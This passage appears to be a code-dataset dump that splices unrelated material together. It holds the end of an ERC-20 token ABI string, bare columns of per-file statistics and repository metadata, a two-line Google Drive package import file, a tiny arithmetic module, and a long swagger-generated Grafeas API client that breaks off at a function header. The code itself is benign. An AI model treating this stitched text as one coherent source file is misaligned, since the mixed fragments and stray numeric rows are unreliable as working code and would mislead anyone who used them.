":[{"indexed":true,"internalType":"bytes32","name":"role","type":"bytes32"},{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":true,"internalType":"address","name":"sender","type":"address"}],"name":"RoleRevoked","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[],"name":"DEFAULT_ADMIN_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"DOMAIN_SEPARATOR","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MINTER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"PAUSER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"TRANSFER_ROLE","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"contractURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleAdmin","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"getRoleMember","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"}],"name":"getRoleMemberCount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"grantRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"hasRole","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"isRestrictedTransfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"forwarder","type":"address"}],"name":"isTrustedForwarder","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"},{"internalType":"uint256","name":"deadline","type":"uint256"},{"internalType":"uint8","name":"v","type":"uint8"},{"internalType":"bytes32","name":"r","type":"bytes32"},{"internalType":"bytes32","name":"s","type":"bytes32"}],"name":"permit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"renounceRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes32","name":"role","type":"bytes32"},{"internalType":"address","name":"account","type":"address"}],"name":"revokeRole","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_URI","type":"string"}],"name":"setContractURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bool","name":"_restrictedTransfer","type":"bool"}],"name":"setRestrictedTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"}]' # noqa: E501 (line-too-long)
)
# pylint: disable=too-many-lines
| 49.405359
| 9,643
| 0.690388
| 13,004
| 116,152
| 5.90972
| 0.02653
| 0.087131
| 0.049447
| 0.047469
| 0.883813
| 0.855172
| 0.83002
| 0.811191
| 0.800755
| 0.749317
| 0
| 0.00414
| 0.188985
| 116,152
| 2,350
| 9,644
| 49.426383
| 0.811669
| 0.171697
| 0
| 0.616417
| 1
| 0.000789
| 0.116007
| 0.106741
| 0
| 0
| 0
| 0
| 0.033938
| 1
| 0.175217
| false
| 0.002368
| 0.011839
| 0
| 0.384373
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ca2444cd2e76f11e970b50a9a738ca97c734bfcd
| 129
|
py
|
Python
|
sites/google_drive/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 15
|
2020-03-17T15:43:46.000Z
|
2022-01-08T04:23:49.000Z
|
sites/google_drive/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 5
|
2020-03-12T10:05:27.000Z
|
2021-03-03T16:01:47.000Z
|
sites/google_drive/__init__.py
|
GeorgOhneH/ethz-document-fetcher
|
42921e5d71698a269eb54cf9d3979e4a7d88a9cf
|
[
"MIT"
] | 2
|
2020-03-17T17:09:20.000Z
|
2020-12-28T22:59:17.000Z
|
from sites.google_drive.get_website_url import get_website_url
from sites.google_drive.producer import producer, get_folder_name
| 43
| 65
| 0.891473
| 21
| 129
| 5.095238
| 0.52381
| 0.168224
| 0.280374
| 0.373832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069767
| 129
| 2
| 66
| 64.5
| 0.891667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ca39475fcf588893a9ebfe9babeef12897abee56
| 128
|
py
|
Python
|
mathfun.py
|
cute-git/try_unit
|
d441bbb30a3a6eaa11b8a619b553a03719f96943
|
[
"Apache-2.0"
] | null | null | null |
mathfun.py
|
cute-git/try_unit
|
d441bbb30a3a6eaa11b8a619b553a03719f96943
|
[
"Apache-2.0"
] | null | null | null |
mathfun.py
|
cute-git/try_unit
|
d441bbb30a3a6eaa11b8a619b553a03719f96943
|
[
"Apache-2.0"
] | null | null | null |
def add(a,b):
return a + b
def minus(a,b):
return a-b
def multi(a,b):
return a*b
def divide(a,b):
return a/b
| 10.666667
| 16
| 0.554688
| 28
| 128
| 2.535714
| 0.285714
| 0.225352
| 0.450704
| 0.507042
| 0.690141
| 0.549296
| 0
| 0
| 0
| 0
| 0
| 0
| 0.289063
| 128
| 11
| 17
| 11.636364
| 0.78022
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
ca49818502adb842b2ecff9b554afe6a7db0f322
| 60,891
|
py
|
Python
|
grafeas/api/grafeas_api.py
|
atlassian-forks/client-python
|
111cb2184324595931e42233707a58cff77cb6ec
|
[
"Apache-2.0"
] | 6
|
2018-01-22T21:54:56.000Z
|
2020-07-26T14:52:13.000Z
|
grafeas/api/grafeas_api.py
|
atlassian-forks/client-python
|
111cb2184324595931e42233707a58cff77cb6ec
|
[
"Apache-2.0"
] | 6
|
2018-07-12T12:56:16.000Z
|
2021-07-13T00:33:24.000Z
|
grafeas/api/grafeas_api.py
|
atlassian-forks/client-python
|
111cb2184324595931e42233707a58cff77cb6ec
|
[
"Apache-2.0"
] | 19
|
2018-07-12T11:08:44.000Z
|
2022-03-09T06:17:04.000Z
|
# coding: utf-8
"""
An API to insert and retrieve metadata on cloud artifacts.
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: v1alpha1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from grafeas.api_client import ApiClient
class GrafeasApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_note(self, parent, body, **kwargs): # noqa: E501
"""Creates a new `Note`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_note(parent, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: This field contains the project Id for example: \"project/{project_id} (required)
:param ApiNote body: The Note to be inserted (required)
:return: ApiNote
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_note_with_http_info(parent, body, **kwargs) # noqa: E501
else:
(data) = self.create_note_with_http_info(parent, body, **kwargs) # noqa: E501
return data
def create_note_with_http_info(self, parent, body, **kwargs): # noqa: E501
"""Creates a new `Note`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_note_with_http_info(parent, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: This field contains the project Id for example: \"project/{project_id} (required)
:param ApiNote body: The Note to be inserted (required)
:return: ApiNote
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['parent', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_note" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'parent' is set
if ('parent' not in params or
params['parent'] is None):
raise ValueError("Missing the required parameter `parent` when calling `create_note`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_note`") # noqa: E501
collection_formats = {}
path_params = {}
if 'parent' in params:
path_params['parent'] = params['parent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{parent=projects/*}/notes', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiNote', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_occurrence(self, parent, body, **kwargs): # noqa: E501
"""Creates a new `Occurrence`. Use this method to create `Occurrences` for a resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_occurrence(parent, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: This field contains the project Id for example: \"projects/{project_id}\" (required)
:param ApiOccurrence body: The occurrence to be inserted. (required)
:return: ApiOccurrence
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_occurrence_with_http_info(parent, body, **kwargs) # noqa: E501
else:
(data) = self.create_occurrence_with_http_info(parent, body, **kwargs) # noqa: E501
return data
def create_occurrence_with_http_info(self, parent, body, **kwargs): # noqa: E501
"""Creates a new `Occurrence`. Use this method to create `Occurrences` for a resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_occurrence_with_http_info(parent, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: This field contains the project Id for example: \"projects/{project_id}\" (required)
:param ApiOccurrence body: The occurrence to be inserted. (required)
:return: ApiOccurrence
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['parent', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_occurrence" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'parent' is set
if ('parent' not in params or
params['parent'] is None):
raise ValueError("Missing the required parameter `parent` when calling `create_occurrence`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_occurrence`") # noqa: E501
collection_formats = {}
path_params = {}
if 'parent' in params:
path_params['parent'] = params['parent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{parent=projects/*}/occurrences', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiOccurrence', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_operation(self, parent, body, **kwargs): # noqa: E501
"""Creates a new `Operation`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_operation(parent, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: The projectId that this operation should be created under. (required)
:param ApiCreateOperationRequest body: (required)
:return: GooglelongrunningOperation
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_operation_with_http_info(parent, body, **kwargs) # noqa: E501
else:
(data) = self.create_operation_with_http_info(parent, body, **kwargs) # noqa: E501
return data
def create_operation_with_http_info(self, parent, body, **kwargs): # noqa: E501
"""Creates a new `Operation`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_operation_with_http_info(parent, body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str parent: The projectId that this operation should be created under. (required)
:param ApiCreateOperationRequest body: (required)
:return: GooglelongrunningOperation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['parent', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_operation" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'parent' is set
if ('parent' not in params or
params['parent'] is None):
raise ValueError("Missing the required parameter `parent` when calling `create_operation`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_operation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'parent' in params:
path_params['parent'] = params['parent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{parent=projects/*}/operations', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GooglelongrunningOperation', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_note(self, name, **kwargs): # noqa: E501
"""Deletes the given `Note` from the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_note(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the note in the form of \"providers/{provider_id}/notes/{NOTE_ID}\" (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_note_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.delete_note_with_http_info(name, **kwargs) # noqa: E501
return data
def delete_note_with_http_info(self, name, **kwargs): # noqa: E501
"""Deletes the given `Note` from the system. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_note_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the note in the form of \"providers/{provider_id}/notes/{NOTE_ID}\" (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_note" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_note`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name=projects/*/notes/*}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_occurrence(self, name, **kwargs): # noqa: E501
"""Deletes the given `Occurrence` from the system. Use this when an `Occurrence` is no longer applicable for the given resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_occurrence(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the occurrence in the form of \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_occurrence_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.delete_occurrence_with_http_info(name, **kwargs) # noqa: E501
return data
def delete_occurrence_with_http_info(self, name, **kwargs): # noqa: E501
"""Deletes the given `Occurrence` from the system. Use this when an `Occurrence` is no longer applicable for the given resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_occurrence_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the occurrence in the form of \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_occurrence" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_occurrence`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name=projects/*/occurrences/*}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_note(self, name, **kwargs): # noqa: E501
"""Returns the requested `Note`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_note(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the note in the form of \"providers/{provider_id}/notes/{NOTE_ID}\" (required)
:return: ApiNote
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_note_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_note_with_http_info(name, **kwargs) # noqa: E501
return data
def get_note_with_http_info(self, name, **kwargs): # noqa: E501
"""Returns the requested `Note`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_note_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the note in the form of \"providers/{provider_id}/notes/{NOTE_ID}\" (required)
:return: ApiNote
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_note" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_note`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name=projects/*/notes/*}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiNote', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_occurrence(self, name, **kwargs): # noqa: E501
"""Returns the requested `Occurrence`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_occurrence(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the occurrence of the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
:return: ApiOccurrence
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_occurrence_with_http_info(name, **kwargs) # noqa: E501
else:
(data) = self.get_occurrence_with_http_info(name, **kwargs) # noqa: E501
return data
def get_occurrence_with_http_info(self, name, **kwargs): # noqa: E501
"""Returns the requested `Occurrence`. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_occurrence_with_http_info(name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str name: The name of the occurrence of the form \"projects/{project_id}/occurrences/{OCCURRENCE_ID}\" (required)
:return: ApiOccurrence
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_occurrence" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_occurrence`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/v1alpha1/{name=projects/*/occurrences/*}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApiOccurrence', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_occurrence_note(self, name, **kwargs): # noqa: E501
